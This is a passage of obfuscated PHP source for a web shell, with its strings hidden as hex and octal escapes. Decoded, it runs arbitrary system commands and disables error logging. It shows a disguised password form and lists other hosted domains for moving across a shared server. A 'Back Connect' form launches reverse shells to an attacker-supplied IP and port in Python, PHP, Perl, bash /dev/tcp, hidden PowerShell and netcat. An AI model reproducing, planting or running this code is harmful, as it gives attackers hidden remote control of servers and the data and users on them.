"\x20\55\76\x20\x5b\x3c\146\x6f\x6e\164\40\143\157\x6c\x6f\x72\x3d\162\x65\144\76\103\x61\x6e\x6e\x6f\164\40\147\145\164\40\x64\x6f\155\141\151\156\40\x6e\141\155\145\74\57\x66\x6f\x6e\164\76\135"; } else { preg_match_all("\x23\x2f\x76\141\162\x2f\156\141\155\x65\144\57\x28\x2e\x2a\77\51\x2e\144\142\43", $domain_jump, $domjump); foreach ($domjump[1] as $dj) { $valuserjump = posix_getpwuid(@fileowner("\x2f\145\x74\x63\57\166\141\x6c\151\x61\163\x65\163\x2f{$dj}")); $valuserjump = $valuserjump["\156\x61\155\x65"]; if ($valuserjump == $uservaljump) { echo "\x20\x2d\x3e\40\133\x3c\x75\76{$dj}\x3c\57\165\x3e\x5d\x3c\x62\162\76"; break; } } } } else { echo "\x3c\x62\x72\x3e"; } } } } } if ($i == 0) { } else { echo "\74\x62\162\76\x54\157\164\x61\154\x20" . $i . "\40\x43\141\156\x20\152\x75\155\x70\x69\x6e\147\40\157\156\x20\164\150\151\163\x20\x73\x65\162\166\145\162\x20" . gethostbyname($_SERVER["\110\124\x54\120\137\110\x4f\x53\x54"]) . "\41"; } echo "\x3c\57\160\x72\145\x3e\xa\40\40\x20\x20\74\x2f\x64\x69\x76\x3e"; } goto iHhYJ; Qt1rA: if ($_1337["\141\x63\x74\x69\x6f\x6e"] == "\162\145\156\x61\x6d\145\x5f\x66\157\x6c\x64\x65\162") { if ($_1337["\162\x5f\144"]) { $r_d = rename($dir, '' . dirname($dir) . "\x2f" . htmlspecialchars($_1337["\x72\137\144"]) . ''); if ($r_d) { echo "\x3c\163\x74\x72\157\x6e\147\x3e\122\x65\x6e\x61\155\x65\40\146\157\154\x64\x65\x72\74\x2f\163\x74\162\x6f\x6e\147\x3e\40\x4f\x4b\41\40" . ok() . "\x3c\141\40\143\154\x61\163\163\x3d\42\142\x74\156\x2d\x63\x6c\157\x73\145\42\x20\x68\x72\x65\146\75\x22\x3f\x70\x61\x74\150\x3d" . dirname($dir) . "\x22\76\74\x2f\141\x3e\x3c\x2f\x64\x69\166\76"; } else { echo "\x3c\x73\164\x72\157\156\x67\76\x52\145\x6e\141\155\x65\40\146\157\x6c\144\x65\162\74\57\x73\x74\x72\157\x6e\x67\x3e\40\106\101\x49\x4c\41\40" . er() . "\x3c\x61\x20\143\x6c\x61\x73\163\75\42\142\x74\156\x2d\x63\154\x6f\163\x65\x22\x20\x68\162\145\146\75\42\x3f\x70\x61\x74\150\x3d" . dirname($dir) . "\42\76\74\x2f\x61\x3e\74\57\144\151\166\x3e"; } } s(); echo "\12\11\x9\x3c\x64\151\x76\40\143\154\x61\x73\163\75\47\x62\x74\x6e\55\x67\x72\x6f\x75\x70\x27\x3e\xa\74\141\40\x63\154\x61\x73\163\75\x27\x62\x74\156\40\142\164\156\x2d\157\165\x74\x6c\151\x6e\x65\55\154\x69\x67\x68\164\x20\142\x74\156\55\163\x6d\x27\x20\150\x72\x65\x66\75\47\77\x64\151\x72\x3d{$path}\x26\x61\x63\x74\x69\x6f\x6e\75\x72\145\x6e\x61\155\145\137\146\157\x6c\x64\145\x72\47\76\74\x69\40\143\154\141\163\x73\75\47\x62\x69\40\142\x69\x2d\x70\145\x6e\143\x69\154\x2d\x66\151\x6c\154\47\x3e\74\x2f\x69\x3e\x3c\x2f\141\x3e\xa\x3c\x61\x20\x63\x6c\141\163\x73\75\x27\x62\164\x6e\x20\x62\x74\x6e\x2d\x6f\x75\164\x6c\151\156\145\55\x6c\x69\147\x68\164\40\x62\164\156\55\163\155\x27\40\150\162\145\x66\x3d\x27\77\144\x69\x72\x3d{$path}\46\x61\143\x74\151\157\156\75\x63\x68\141\156\147\x65\x6d\x6f\144\x69\x66\x69\145\x64\x5f\146\157\154\144\145\162\47\76\74\151\40\143\154\x61\163\x73\75\47\142\151\40\142\151\55\143\x61\154\x65\x6e\144\141\162\x2d\x64\x61\x74\x65\47\x3e\74\57\151\x3e\x3c\x2f\x61\x3e\xa\x3c\x21\55\55\74\141\40\x63\154\141\163\163\75\x27\x62\164\156\x20\142\164\x6e\x2d\x6f\165\x74\x6c\151\156\x65\x2d\154\151\x67\x68\164\40\x62\164\x6e\x2d\163\155\47\x20\150\x72\x65\146\75\x27\77\144\x69\x72\75{$path}\x26\x61\x63\164\x69\x6f\x6e\x3d\x63\x68\145\155\x6f\144\47\x3e\74\151\x20\x63\x6c\x61\163\163\x3d\47\142\151\40\x62\x69\x2d\x66\x69\154\x65\x2d\145\141\x72\x6d\141\162\x6b\55\x6d\x65\144\151\x63\141\154\x27\x3e\74\57\x69\x3e\x3c\57\x61\x3e\x2d\x2d\76\xa\74\x61\40\143\154\141\x73\163\75\47\142\x74\x6e\x20\x62\164\x6e\x2d\x6f\x75\164\154\x69\x6e\145\55\144\x61\x6e\147\x65\162\x20\x62\164\156\55\x73\155\47\x20\x68\x72\x65\x66\x3d\x27\77\x64\151\162\75{$path}\46\141\143\x74\151\157\156\x3d\144\x65\154\145\164\x65\137\146\x6f\x6c\x64\145\x72\47\76\74\151\40\x63\154\x61\x73\x73\x3d\x27\142\151\40\x62\151\x2d\x74\162\141\x73\150\x2d\146\x69\154\x6c\x27\x3e\74\57\x69\76\x3c\57\x61\76\12\x9\11\x3c\x2f\x64\151\166\76\xa\x9\x9\74\x62\162\x3e\12\11\11\x9\74\151\x20\143\x6c\141\x73\x73\75\47\142\x69\40\142\151\55\x66\x6f\x6c\x64\145\x72\55\146\x69\x6c\x6c\x27\x3e\x3c\57\x69\x3e\72\46\156\x62\x73\x70\73" . basename($dir) . "\xa\11\11\x3c\57\142\162\x3e\12\11\x9\74\x66\157\x72\x6d\40\x6d\145\x74\x68\157\144\x3d\x27\x50\x4f\x53\x54\47\x3e\12\11\11\x9\x3c\144\x69\166\x20\143\x6c\x61\x73\x73\x3d\47\x69\x6e\160\165\164\55\x67\162\x6f\165\160\47\76\xa\x9\x9\11\11\74\151\x6e\x70\x75\164\x20\x63\x6c\141\x73\x73\x3d\47\146\157\162\155\x2d\x63\157\x6e\164\x72\x6f\154\40\142\x74\x6e\x2d\163\155\x27\40\164\171\160\145\x3d\x27\164\145\x78\x74\x27\x20\166\x61\154\165\145\75\x27" . basename($dir) . "\x27\40\x6e\141\155\x65\x3d\x27\x72\137\144\47\x20{$_r}\76\12\x9\11\11\x9\x3c\142\x75\x74\164\x6f\156\x20\x63\154\x61\x73\163\x3d\x27\142\164\x6e\40\x62\x74\x6e\55\157\165\x74\154\x69\x6e\145\55\154\151\x67\150\x74\x20\142\164\x6e\x2d\163\155\x27\x20\164\x79\160\145\75\x27\x73\165\142\155\x69\x74\47\76\74\x69\x20\x63\154\x61\x73\x73\75\x27\x62\151\x20\142\151\x2d\145\x6d\157\152\151\55\163\155\x69\x6c\x65\55\165\x70\163\151\144\145\55\x64\x6f\167\156\x27\x3e\x3c\57\x69\76\74\x2f\142\165\x74\164\157\x6e\76\12\11\x9\x9\x3c\57\144\x69\166\x3e\xa\11\11\74\x2f\146\157\x72\x6d\76"; } goto HwDnQ; xSzhg: function exe($cmd) { $method = ''; if (function_exists("\163\171\163\164\145\x6d")) { $method = "\x73\x79\x73\x74\145\x6d"; @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return "{$method}\x3a\40{$buff}"; } elseif (function_exists("\x65\x78\145\143")) { $method = "\145\170\x65\x63"; @exec($cmd, $results); $buff = ''; foreach ($results as $result) { $buff .= $result; } return "{$method}\x3a\40{$buff}"; } elseif (function_exists("\x70\141\163\163\x74\x68\x72\165")) { $method = "\x70\141\x73\x73\x74\150\162\165"; @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return "{$method}\72\40{$buff}"; } elseif (function_exists("\x73\150\x65\154\x6c\x5f\145\x78\145\x63")) { $method = "\x73\150\x65\154\x6c\x5f\145\170\x65\143"; $buff = @shell_exec($cmd); return "{$method}\x3a\40{$buff}"; } elseif (function_exists("\x60")) { $method = "\142\141\x63\153\164\151\143\x6b\163"; $buff = `{$cmd}`; return "{$method}\72\40{$buff}"; } elseif (function_exists("\x70\x6f\160\145\156")) { $method = "\160\157\160\145\x6e"; $handle = @popen($cmd, "\x72"); $buff = ''; if ($handle) { while (!feof($handle)) { $buff .= fread($handle, 4096); } @pclose($handle); } return "{$method}\72\x20{$buff}"; } elseif (function_exists("\x70\162\157\x63\137\x6f\160\x65\156")) { $method = "\160\x72\x6f\x63\x5f\157\x70\x65\x6e"; $descriptorspec = array(0 => array("\160\x69\160\145", "\162"), 1 => array("\x70\151\160\145", "\167"), 2 => array("\x70\151\160\x65", "\167")); $process = @proc_open($cmd, $descriptorspec, $pipes); $buff = ''; if (is_resource($process)) { fclose($pipes[0]); while (!feof($pipes[1])) { $buff .= fread($pipes[1], 4096); } fclose($pipes[1]); fclose($pipes[2]); @proc_close($process); } return "{$method}\x3a\40{$buff}"; } return false; } goto O80k0; iv_HC: @ini_set("\157\x75\164\x70\165\164\x5f\x62\x75\146\146\x65\x72\151\x6e\x67", 0); goto x7c3H; wq8hw: if (isset($_1337["\x6f\160\156"])) { $file = $_1337["\157\x70\156"]; } goto x5qzN; epcoG: function ia() { $ia = ''; if (getenv("\x48\x54\x54\x50\137\x43\x4c\111\105\x4e\124\137\x49\120")) { $ia = getenv("\x48\x54\124\120\137\103\x4c\x49\105\116\124\x5f\111\x50"); } elseif (getenv("\x48\x54\x54\x50\137\130\x5f\x46\x4f\x52\127\x41\122\104\105\104\137\x46\117\122")) { $ia = getenv("\x48\124\x54\120\137\130\137\106\117\122\x57\101\x52\104\x45\104\x5f\106\117\122"); } elseif (getenv("\x48\124\x54\120\137\130\x5f\106\x4f\122\x57\x41\122\x44\x45\104")) { $ia = getenv("\x48\124\x54\x50\x5f\x58\x5f\x46\117\x52\127\x41\x52\x44\x45\104"); } elseif (getenv("\110\124\124\x50\x5f\x46\x4f\122\x57\101\x52\x44\x45\x44\137\106\117\122")) { $ia = getenv("\x48\124\124\120\137\x46\x4f\122\127\101\x52\104\105\104\x5f\x46\x4f\x52"); } elseif (getenv("\110\124\x54\120\x5f\106\x4f\x52\x57\x41\122\x44\105\x44")) { $ia = getenv("\x48\x54\124\120\x5f\x46\x4f\122\127\x41\122\x44\105\x44"); } elseif (getenv("\x52\105\115\117\124\x45\x5f\101\104\x44\122")) { $ia = getenv("\x52\105\115\117\x54\x45\x5f\x41\104\x44\122"); } else { $ia = "\x55\156\x6b\x6e\x6f\167\x6e\40\x49\x50"; } return $ia; } goto gVMRu; BO6Au: echo "\46\x6e\x62\163\160\x3b\133\40" . w($path, p($path)) . "\x20\135"; goto S_jZN; sxLaR: function logsx() { die("\74\146\x6f\x72\x6d\40\155\x65\x74\150\157\x64\75\x27\x70\x6f\163\164\x27\x3e\74\151\156\160\x75\164\40\x74\x79\160\x65\x3d\x27\x70\141\163\x73\167\x6f\x72\x64\47\40\163\164\x79\x6c\x65\75\47\164\145\x78\x74\x2d\144\145\143\157\162\x61\x74\151\x6f\x6e\x3a\156\157\x6e\145\x3b\142\141\143\153\147\162\x6f\165\156\144\x2d\x63\157\154\x6f\162\x3a\x20\x74\162\141\x6e\163\160\x61\162\145\x6e\164\73\x62\157\162\144\145\x72\72\40\156\x6f\156\145\73\142\x6f\162\144\145\162\x2d\142\x6f\x74\x74\x6f\155\72\x20\x30\160\170\73\143\x6f\x6c\x6f\162\72\x20\164\x72\x61\x6e\x73\160\x61\x72\x65\156\x74\73\x6f\x75\164\154\151\156\x65\72\40\156\x6f\156\x65\73\47\40\x6e\141\155\x65\x3d\47\160\x61\163\163\47\x3e\x3c\57\x66\157\x72\155\x3e"); } goto eqiB1; lHbNL: @ini_set("\x6c\157\147\137\x65\x72\162\157\162\163", 0); goto N78pn; wJ3It: $disfunc = @ini_get("\x64\x69\163\x61\x62\154\x65\x5f\146\165\156\143\164\x69\x6f\156\x73"); goto W00tD; xxaNk: if ($_1337["\151\144"] == "\x62\x61\143\153\x63\157\156") { s(); echo "\x3c\x63\x65\x6e\x74\145\162\40\143\x6c\141\163\x73\x3d\42\x61\156\x75\42\x3e\102\141\x63\x6b\40\103\157\156\x6e\x65\x63\164\x20\50\x52\145\166\x65\162\163\145\x20\123\x68\x65\x6c\x6c\51\74\57\x63\x65\x6e\x74\145\162\76"; echo "\74\x64\151\166\40\143\x6c\x61\163\163\x3d\x27\x63\141\x72\x64\x20\143\141\x72\144\x2d\x62\x6f\x64\171\40\x74\145\170\164\55\144\141\162\x6b\40\151\x6e\160\165\164\55\x67\x72\157\x75\160\40\155\142\55\x33\47\76\xa\x9\x3c\x66\157\162\155\40\x6d\x65\x74\x68\x6f\x64\75\47\x70\157\163\164\x27\x3e\12\40\x20\40\x20\74\x69\x20\x63\x6c\141\x73\163\x3d\47\x62\151\x20\x62\151\55\150\144\144\55\x6e\x65\164\167\157\162\153\x27\76\x3c\x2f\151\76\x20\x49\x50\40\101\144\x64\162\145\x73\x73\x3a\xa\x9\x9\11\x3c\x69\156\x70\x75\x74\40\x74\171\160\145\x3d\x27\x74\x65\170\164\47\x20\x63\154\141\163\163\75\x27\146\x6f\x72\x6d\x2d\143\x6f\156\164\162\157\154\x20\142\164\x6e\55\x73\x6d\x20\x74\145\170\x74\55\x64\x61\x72\153\47\x20\x6e\x61\x6d\x65\x3d\x27\x69\160\47\40\160\154\141\143\x65\x68\157\154\144\145\162\x3d\47\111\120\47\76\12\x20\40\x20\40\40\40\40\x20\40\x20\40\x20\x3c\x69\40\143\154\141\x73\x73\75\x27\x62\x69\x20\x62\x69\x2d\x68\x64\144\x27\x3e\x3c\x2f\151\x3e\x20\x50\157\x72\164\x3a\12\x9\x9\x9\x3c\x69\x6e\160\165\164\x20\164\x79\x70\145\75\x27\x74\x65\170\164\x27\x20\143\154\141\163\163\x3d\x27\146\157\162\155\x2d\x63\x6f\156\164\162\157\154\x20\142\x74\x6e\55\163\155\40\x74\145\x78\x74\x2d\144\141\162\153\47\x20\156\141\x6d\145\75\47\160\x6f\x72\x74\x27\x20\160\154\x61\x63\145\x68\x6f\154\144\x65\162\75\x27\x50\157\x72\x74\x27\x3e\xa\x20\40\40\40\40\x20\40\x20\40\40\x20\x20\74\151\40\143\x6c\x61\x73\x73\x3d\x27\142\x69\x20\142\151\55\150\x64\x64\55\x6e\145\x74\x77\x6f\x72\x6b\47\x3e\x3c\x2f\x69\x3e\x20\x52\x65\166\x65\x72\x73\145\40\x53\150\x65\154\x6c\40\165\163\151\x6e\x67\72\xa\x9\11\11\x3c\163\145\x6c\145\143\164\x20\x63\x6c\141\x73\163\x3d\47\x66\x6f\162\x6d\x2d\143\157\156\x74\x72\157\154\x20\142\164\156\55\163\x6d\x20\164\x65\170\164\55\x64\x61\x72\153\47\40\156\141\155\x65\x3d\47\142\141\143\x6b\144\x6f\x6f\162\x27\x3e\12\x9\x9\x9\11\74\157\160\x74\151\157\x6e\40\x76\x61\154\165\145\75\x27\x31\x27\x3e\x50\x79\164\150\157\156\x3c\x2f\157\x70\x74\151\x6f\156\x3e\xa\40\x20\x20\40\40\x20\40\40\x20\x20\40\40\x20\40\x20\x20\x3c\157\160\x74\151\157\x6e\40\166\141\154\x75\x65\75\x27\x32\x27\76\120\171\164\x68\157\156\63\x3c\57\157\x70\164\151\x6f\x6e\x3e\xa\11\x9\11\x9\74\x6f\160\x74\x69\157\156\40\x76\141\154\x75\145\75\47\63\x27\x3e\120\110\x50\x3c\x2f\x6f\160\164\151\x6f\x6e\76\xa\x9\x9\11\11\x3c\x6f\160\164\x69\157\156\x20\166\x61\x6c\x75\x65\x3d\x27\x34\47\x3e\120\x65\x72\154\74\x2f\157\x70\164\x69\157\x6e\x3e\12\x9\11\11\11\x3c\157\160\164\x69\157\x6e\x20\x76\x61\x6c\x75\145\75\x27\65\47\x3e\x42\141\163\150\74\x2f\157\x70\164\151\x6f\x6e\x3e\12\x20\40\x20\40\40\40\x20\x20\x20\40\40\x20\x20\x20\40\40\x3c\157\160\164\x69\157\x6e\x20\x76\141\x6c\165\145\75\47\x37\47\76\116\x65\x74\x63\x61\164\74\x2f\157\x70\x74\x69\157\x6e\76\xa\x20\x20\x20\40\40\x20\40\40\x20\x20\x20\40\40\40\x20\x20\x3c\157\x70\164\x69\x6f\x6e\40\166\x61\x6c\165\145\x3d\47\x36\47\76\127\151\156\144\x6f\167\163\40\x28\120\157\x77\x65\162\163\150\x65\154\x6c\51\x3c\57\157\160\164\x69\x6f\156\x3e\12\11\x9\x9\x3c\x2f\163\145\154\145\143\x74\x3e\xa\40\40\40\x20\40\40\40\x20\74\144\x69\166\x20\x63\x6c\141\x73\163\x3d\x27\144\x2d\x67\162\x69\144\x20\x67\x61\160\x2d\62\x27\76\x3c\142\165\x74\164\x6f\156\x20\x74\x79\x70\145\75\47\163\x75\142\155\x69\x74\47\40\x63\x6c\x61\163\x73\x3d\x27\142\x74\156\40\x62\164\x6e\55\144\x61\162\153\40\142\x74\156\55\x73\x6d\47\40\x6e\x61\155\x65\75\x27\x73\x75\142\x6d\151\164\x27\76\x53\x75\142\155\x69\164\x21\x3c\57\x62\x75\x74\164\x6f\x6e\76\74\x2f\144\151\166\76\xa\x9\74\x2f\x66\x6f\162\155\76\74\x2f\144\x69\166\76\x3c\x62\162\x3e"; if (isset($_POST["\163\165\x62\x6d\151\164"])) { $backdoor = $_POST["\142\141\143\x6b\144\x6f\x6f\162"]; $ip = $_POST["\x69\160"]; $port = $_POST["\x70\157\162\x74"]; if ($backdoor == 1) { $command = "\x70\171\164\150\157\156\x20\x2d\x63\x20\47\x69\x6d\x70\x6f\x72\164\x20\x73\157\x63\153\x65\x74\54\163\x75\142\160\x72\157\x63\145\x73\163\54\x6f\x73\73\163\75\163\x6f\x63\153\145\164\x2e\x73\x6f\143\153\145\164\50\x73\x6f\143\153\x65\164\56\x41\x46\137\x49\x4e\105\x54\x2c\x73\157\143\x6b\x65\164\56\123\117\103\x4b\x5f\x53\124\122\x45\101\115\x29\x3b\x73\56\x63\x6f\156\156\145\x63\164\x28\x28\x22{$ip}\42\x2c{$port}\51\x29\x3b\157\163\56\x64\165\160\62\50\163\x2e\x66\151\154\145\x6e\157\x28\51\x2c\60\51\73\40\157\163\x2e\x64\x75\160\62\50\x73\56\x66\x69\154\145\x6e\157\x28\51\54\x31\51\x3b\40\157\163\56\x64\165\160\62\x28\163\x2e\x66\x69\154\145\x6e\157\x28\51\x2c\x32\51\73\x70\75\163\x75\142\x70\x72\x6f\x63\145\x73\x73\x2e\143\141\x6c\x6c\50\x5b\x22\x2f\x62\151\156\57\163\150\x22\x2c\x22\x2d\151\42\x5d\51\73\x27"; } elseif ($backdoor == 2) { $command = "\x70\171\164\150\157\x6e\63\x20\55\143\x20\47\151\155\x70\x6f\x72\x74\x20\x73\x6f\x63\153\145\164\54\163\165\x62\160\162\157\x63\x65\x73\x73\x2c\x6f\163\x3b\x73\75\163\x6f\143\153\x65\164\56\x73\157\x63\153\x65\x74\x28\x73\157\x63\153\x65\x74\56\x41\x46\137\111\x4e\x45\124\x2c\163\x6f\x63\x6b\x65\164\x2e\123\x4f\x43\x4b\x5f\x53\124\x52\x45\x41\115\51\x3b\x73\x2e\143\157\156\x6e\145\143\x74\x28\x28\x22{$ip}\42\54{$port}\x29\x29\x3b\x6f\163\56\144\165\160\62\50\163\56\146\x69\x6c\145\156\157\50\51\54\x30\51\73\40\x73\165\142\x70\x72\157\143\x65\163\163\56\x63\141\154\x6c\50\x5b\x22\x2f\142\151\x6e\57\163\150\x22\54\x22\x2d\151\42\135\x29\73\x27"; } elseif ($backdoor == 3) { $command = "\x70\x68\160\40\x2d\162\x20\47\44\163\157\143\x6b\x3d\146\163\157\143\153\157\x70\145\156\x28\42{$ip}\42\x2c{$port}\x29\73\163\164\162\x65\x61\x6d\137\163\x65\x74\x5f\142\x6c\x6f\143\x6b\151\156\x67\50\x24\x73\157\143\x6b\x2c\x20\x30\x29\x3b\x24\143\x6d\x64\75\x22\x2f\142\151\x6e\x2f\163\x68\40\55\151\x22\x3b\x70\162\157\143\137\x63\x6c\157\163\145\x28\160\x72\157\x63\x5f\157\x70\x65\156\x28\x24\143\155\144\54\40\141\x72\x72\141\171\x28\60\75\76\x24\163\157\143\x6b\x2c\40\x31\x3d\76\44\x73\x6f\x63\153\x2c\40\62\x3d\76\x24\163\157\143\x6b\x29\54\x20\x24\146\x6f\x6f\x29\x29\x3b\x27"; } elseif ($backdoor == 4) { $command = "\160\x65\x72\154\40\55\x65\x20\47\x75\163\145\40\123\x6f\x63\153\145\164\73\x24\151\x3d\42{$ip}\x22\x3b\44\x70\x3d{$port}\x3b\x73\x6f\143\x6b\145\x74\50\123\54\120\x46\137\111\116\105\124\54\123\117\103\113\x5f\123\124\x52\x45\x41\115\54\147\x65\164\160\162\157\164\157\142\x79\x6e\x61\x6d\145\x28\42\164\x63\160\x22\x29\x29\x3b\x69\x66\x28\x63\157\x6e\x6e\145\143\164\x28\123\54\163\x6f\143\x6b\x61\x64\144\162\x5f\151\156\x28\x24\x70\54\151\156\x65\x74\137\x61\x74\157\156\50\44\x69\51\x29\51\x29\173\157\x70\145\x6e\x28\123\124\x44\x49\116\54\42\76\x26\123\x22\x29\x3b\157\x70\x65\156\x28\123\x54\104\x4f\x55\124\54\x22\76\46\123\42\x29\x3b\157\160\x65\x6e\50\x53\124\104\x45\122\x52\x2c\x22\x3e\46\123\x22\51\x3b\145\x78\x65\143\x28\42\x2f\x62\151\x6e\x2f\x73\150\x20\x2d\151\x22\51\73\175\x3b\x27"; } elseif ($backdoor == 5) { $command = "\x2f\142\x69\x6e\57\x62\141\163\150\40\x2d\x63\x20\47\142\x61\x73\150\40\55\151\x20\x3e\46\x20\x2f\144\145\x76\x2f\x74\x63\160\x2f{$ip}\57{$port}\40\x30\76\46\61\47"; } elseif ($backdoor == 6) { $command = "\160\157\167\x65\162\x73\x68\x65\x6c\154\x20\55\116\157\x50\x20\x2d\116\157\x6e\111\x20\55\127\x20\x48\x69\x64\x64\x65\156\x20\x2d\105\170\145\x63\x20\102\171\160\141\x73\x73\x20\55\x43\x6f\155\x6d\141\156\144\40\116\145\167\55\x4f\142\x6a\x65\143\164\40\123\171\x73\164\145\155\x2e\x4e\145\x74\x2e\x53\157\143\x6b\x65\x74\163\x2e\124\x43\120\103\154\151\145\156\164\50\47\x24\x69\x70\x27\54\x24\x70\157\162\x74\x29\x3b\x24\x73\164\162\x65\141\x6d\40\75\40\44\143\154\x69\x65\x6e\164\56\107\x65\164\x53\164\x72\x65\141\x6d\x28\x29\73\x5b\142\x79\164\x65\133\135\135\44\x62\171\x74\x65\163\x20\75\x20\60\x2e\x2e\x36\65\65\63\65\x7c\x25\x7b\x30\x7d\73\x77\150\x69\154\145\50\x28\x24\151\40\x3d\x20\x24\163\164\x72\145\141\155\x2e\x52\145\141\x64\x28\x24\x62\x79\x74\145\163\x2c\x20\60\54\40\44\x62\171\164\x65\x73\56\x4c\x65\156\147\x74\150\x29\x29\x20\x2d\x6e\145\x20\60\51\x7b\173\x3b\44\144\141\164\x61\40\75\40\50\116\145\167\x2d\x4f\142\152\x65\x63\164\x20\55\x54\x79\x70\x65\x4e\141\x6d\145\x20\x53\x79\163\x74\x65\155\56\x54\x65\170\x74\x2e\101\123\x43\111\x49\x45\156\x63\157\144\x69\156\x67\51\56\x47\x65\164\123\164\x72\x69\156\x67\50\44\x62\x79\x74\145\163\54\x30\54\x20\44\151\x29\73\x24\x73\145\x6e\144\x62\141\x63\x6b\40\75\x20\50\151\x65\x78\40\x24\x64\141\x74\141\40\62\76\46\x31\x20\x7c\40\117\x75\164\x2d\123\x74\162\x69\156\x67\x20\x29\73\44\163\145\x6e\144\x62\141\x63\153\x32\40\x20\75\40\44\163\145\x6e\x64\x62\141\x63\153\x20\53\x20\x22\120\123\x20\x22\x20\53\40\x28\x70\x77\144\51\x2e\120\x61\164\150\40\x2b\40\42\76\40\42\x3b\x24\x73\x65\x6e\144\x62\x79\x74\145\40\75\40\x28\x5b\x74\145\170\x74\56\x65\x6e\x63\157\144\x69\156\x67\x5d\x3a\72\101\x53\x43\x49\111\x29\x2e\107\145\x74\102\171\164\x65\x73\50\x24\163\145\x6e\x64\142\x61\143\153\x32\x29\x3b\x24\163\164\162\145\x61\x6d\56\x57\162\x69\164\145\x28\x24\163\145\x6e\144\x62\171\x74\x65\54\x30\54\x24\x73\145\156\144\x62\x79\164\145\x2e\114\145\156\x67\x74\150\x29\x3b\x24\x73\164\162\x65\141\155\56\106\154\x75\163\150\x28\51\175\x7d\73\44\143\154\x69\145\156\164\56\x43\x6c\x6f\163\x65\50\51"; } elseif ($backdoor == 7) { $command = "\x73\x68\x20\55\143\x20\47\156\x63\40{$ip}\40{$port}\40\x2d\145\40\57\x62\151\156\x2f\x62\141\x73\x68\40\x7c\174\x20\x6e\143\40{$ip}\x20{$port}\40\x2d\143\40\57\x62\x69\x6e\57\142\141\163\150\47"; } if (function_exists("\163\171\163\164\145\155")) { system($command); } elseif (function_exists("\x65\x78\145\143")) { exec($command); } elseif (function_exists("\163\x68\x65\x6c\154\x5f\145\x78\x65\x63")) { shell_exec($command); } elseif (function_exists("\160\x61\x73\x73\x74\150\x72\x75")) { passthru($command); } elseif (function_exists("\160\157\160\145\156")) { $handle = popen($command, "\x72"); if ($handle) { while (!feof($handle)) { echo fgets($handle, 4096); } pclose($handle); } } else { proc_open($command, array(0 => array("\x70\151\x70\x65", "\x72"), 1 => array("\x70\151\160\x65", "\167"), 2 => array("\x70\151\x70\145", "\x77")), $pipes); } echo `{$command}`; } } goto nShOo; e7iUg: function Yolo($array) { return is_array($array) ? array_map("\x59\x6f\154\157", $array) : stripslashes($array); } goto YjChs; YgDiD: echo "\12\11\11\74\144\x69\166\x20\x63\154\x61\x73\163\x3d\42\x74\141\x62\x6c\145\55\162\x65\x73\160\x6f\x6e\163\x69\166\x65\42\76\12\11\11\x3c\164\141\x62\154\x65\x20\x63\x6c\141\x73\163\x3d\42\164\x61\142\154\145\40\x74\x61\142\x6c\x65\55\150\157\x76\x65\162\x20\x74\141\142\154\145\55\x64\x61\x72\153\x20\x74\x65\170\164\x2d\x6c\151\147\x68\x74\42\x3e\12\11\x9\74\x74\150\145\141\x64\x3e\xa\11\x9\x3c\164\162\x3e\xa\x9\x9\x9\x3c\164\x64\x20\143\154\141\163\x73\75\x22\x74\145\170\164\x2d\x63\145\x6e\164\145\x72\42\x3e\116\101\115\105\74\x2f\x74\144\x3e\xa\x9\x9\x9\11\x3c\x74\x64\40\x63\154\141\163\163\x3d\42\164\145\x78\164\55\x63\x65\156\x74\145\162\x22\x3e\x54\x59\120\105\74\x2f\164\144\x3e\12\11\11\11\x9\74\x74\x64\40\143\x6c\x61\163\163\x3d\x22\x74\x65\170\164\x2d\143\145\x6e\164\x65\162\42\76\x4c\101\123\124\x20\x4d\x4f\x44\x49\x46\x49\x45\x44\x3c\57\x74\144\76\xa\x9\x9\x9\11\x3c\x74\144\40\x63\x6c\x61\x73\163\75\42\x74\145\170\x74\55\x63\x65\156\x74\x65\x72\x22\76\123\111\132\105\74\x2f\164\144\x3e\12\11\x9\x9\11\x3c\164\144\x20\x63\154\141\x73\163\x3d\42\x74\x65\x78\x74\x2d\143\x65\156\164\145\x72\42\x3e\x4f\127\x4e\105\122\40\74\146\157\x6e\164\40\143\154\x61\163\x73\x3d\42\x74\x65\170\x74\x2d\x64\x61\156\147\145\x72\x22\76\x2f\74\x2f\x66\157\x6e\164\x3e\40\x47\x52\x4f\125\x50\x3c\57\x74\144\x3e\12\x9\x9\11\x9\74\x74\144\40\143\154\141\x73\x73\75\x22\x74\145\170\164\x2d\143\145\x6e\x74\145\x72\42\76\x50\105\122\x4d\111\x53\123\111\117\116\123\x3c\57\164\x64\76\12\x9\11\11\x3c\164\x64\40\x63\x6c\141\x73\163\x3d\42\x74\x65\x78\164\55\x63\x65\x6e\x74\x65\x72\x22\76\x41\x43\x54\x49\x4f\x4e\74\x2f\x74\x64\x3e\xa\11\x9\74\x2f\x74\162\x3e\12\11\11\74\x2f\164\150\145\141\144\76\12\x9\11\74\164\142\x6f\144\x79\40\143\x6c\141\163\163\75\42\164\x65\170\164\55\x6e\157\167\162\141\160\42\76\xa\x9\x9\x3c\x74\x72\76\xa\11\11\x9\x3c\164\x64\76\x3c\x69\40\143\x6c\141\163\163\75\x22\x62\x69\x20\x62\x69\55\x66\x6f\x6c\x64\x65\162\62\x2d\x6f\160\145\156\x22\76\74\57\151\76\40\x3c\x61\40\143\x6c\x61\163\x73\75\42\164\x65\170\164\x2d\144\x65\x63\x6f\162\141\164\151\x6f\156\x2d\156\157\156\x65\40\x74\145\x78\x74\x2d\x77\x68\151\x74\x65\42\40\150\x72\145\x66\x3d\x22\x3f\x70\x61\x74\150\75" . dirname($dir) . 